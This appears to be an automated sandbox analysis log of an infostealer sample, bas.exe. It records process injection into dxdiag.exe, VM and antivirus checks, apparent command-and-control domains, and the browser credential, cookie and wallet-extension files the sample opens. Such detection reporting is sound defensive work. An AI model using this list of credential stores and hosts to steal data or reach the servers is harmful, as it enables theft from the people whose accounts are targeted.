            Source: dxdiag.exe, 00000003.00000003.1505764850.0000000005170000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1481608163.0000000005177000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1505764850.00000000051F2000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1481748678.000000000515A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: bas.exeReversingLabs: Detection: 26%
            Source: bas.exeVirustotal: Detection: 30%
            Source: unknownProcess created: C:\Users\user\Desktop\bas.exe "C:\Users\user\Desktop\bas.exe"
            Source: C:\Users\user\Desktop\bas.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
            Source: C:\Users\user\Desktop\bas.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
            Source: C:\Users\user\Desktop\bas.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
            Source: C:\Users\user\Desktop\bas.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
            Source: C:\Users\user\Desktop\bas.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\bas.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: bas.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: bas.exeStatic file information: File size 13164032 > 1048576
            Source: bas.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xa4ac00
            Source: bas.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x147e00
            Source: bas.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
            Source: bas.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: bas.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: bas.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: bas.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: bas.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: bas.exeStatic PE information: section name: .fptable
            Source: bas.exeStatic PE information: section name: _RDATA
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02CDCB4E push eax; retf 3_3_02CDCB51
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02CDCB4E push eax; retf 3_3_02CDCB51
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02CDC34E push eax; ret 3_3_02CDC351
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02CDC34E push eax; ret 3_3_02CDC351
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02CDCB5E pushad ; retf 3_3_02CDCB61
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02CDCB5E pushad ; retf 3_3_02CDCB61
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02CDC35E pushad ; ret 3_3_02CDC361
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02CDC35E pushad ; ret 3_3_02CDC361
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02CDC352 push eax; ret 3_3_02CDC355
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02CDC352 push eax; ret 3_3_02CDC355
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02CDCB52 push eax; retf 3_3_02CDCB55
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02CDCB52 push eax; retf 3_3_02CDCB55
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02CDCB66 push 6802CDCBh; retf 3_3_02CDCB6D
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02CDCB66 push 6802CDCBh; retf 3_3_02CDCB6D
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02CDC366 push 6802CDC3h; ret 3_3_02CDC36D
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02CDC366 push 6802CDC3h; ret 3_3_02CDC36D
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02CDC362 pushad ; ret 3_3_02CDC365
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02CDC362 pushad ; ret 3_3_02CDC365
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02CDCB62 pushad ; retf 3_3_02CDCB65
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02CDCB62 pushad ; retf 3_3_02CDCB65
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02D25F76 push edi; retf 3_3_02D25F89
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02D25F76 push edi; retf 3_3_02D25F89
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02D02AFB push esi; retf 3_3_02D02B79
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02D02AFB push esi; retf 3_3_02D02B79
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02D0C8CF pushad ; iretd 3_3_02D0C8D5
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02D0C8CF pushad ; iretd 3_3_02D0C8D5
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02D02D12 pushfd ; retf 3_3_02D02D29
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02D02D12 pushfd ; retf 3_3_02D02D29
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02CF0CD7 push cs; iretd 3_3_02CF0CDA
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02CF0CD7 push cs; iretd 3_3_02CF0CDA
            Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 3_3_02CF06F3 push es; iretd 3_3_02CF06F6
            Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\SysWOW64\dxdiag.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exe TID: 7540Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exe TID: 7564Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
            Source: dxdiag.exe, dxdiag.exe, 00000003.00000003.1479269620.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1620904755.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1579174438.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000002.1631649522.0000000002CAC000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1558296148.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000002.1631649522.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: C:\Windows\SysWOW64\dxdiag.exeProcess information queried: ProcessInformationJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\bas.exeMemory allocated: C:\Windows\SysWOW64\dxdiag.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\bas.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: bas.exe, 00000000.00000002.1430754901.00000139AB681000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
            Source: bas.exe, 00000000.00000002.1430754901.00000139AB681000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
            Source: bas.exe, 00000000.00000002.1430754901.00000139AB681000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
            Source: bas.exe, 00000000.00000002.1430754901.00000139AB681000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
            Source: bas.exe, 00000000.00000002.1430754901.00000139AB681000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
            Source: bas.exe, 00000000.00000002.1430754901.00000139AB681000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
            Source: bas.exe, 00000000.00000002.1430754901.00000139AB681000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
            Source: bas.exe, 00000000.00000002.1430754901.00000139AB681000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
            Source: bas.exe, 00000000.00000002.1430754901.00000139AB681000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: volcanohushe.click
            Source: C:\Users\user\Desktop\bas.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\bas.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\bas.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 440000Jump to behavior
            Source: C:\Users\user\Desktop\bas.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 443000Jump to behavior
            Source: C:\Users\user\Desktop\bas.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 452000Jump to behavior
            Source: C:\Users\user\Desktop\bas.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 2AB0008Jump to behavior
            Source: C:\Users\user\Desktop\bas.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
            Source: C:\Users\user\Desktop\bas.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bas.exeCode function: 0_2_00007FF64F0D3A6C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF64F0D3A6C
            Source: C:\Windows\SysWOW64\dxdiag.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: dxdiag.exe, 00000003.00000002.1631649522.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1620904755.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\SysWOW64\dxdiag.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: dxdiag.exe PID: 7524, type: MEMORYSTR
            Source: dxdiag.exeString found in binary or memory: Wallets/Electrum-LTC
            Source: dxdiag.exeString found in binary or memory: Wallets/ElectronCash
            Source: dxdiag.exeString found in binary or memory: Wallets/JAXX New Version
            Source: dxdiag.exeString found in binary or memory: window-state.json
            Source: dxdiag.exeString found in binary or memory: ExodusWeb3
            Source: dxdiag.exeString found in binary or memory: %appdata%\Ethereum
            Source: dxdiag.exe, 00000003.00000003.1558445081.0000000002CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: dxdiag.exe, 00000003.00000003.1558932047.0000000002CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqliteJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
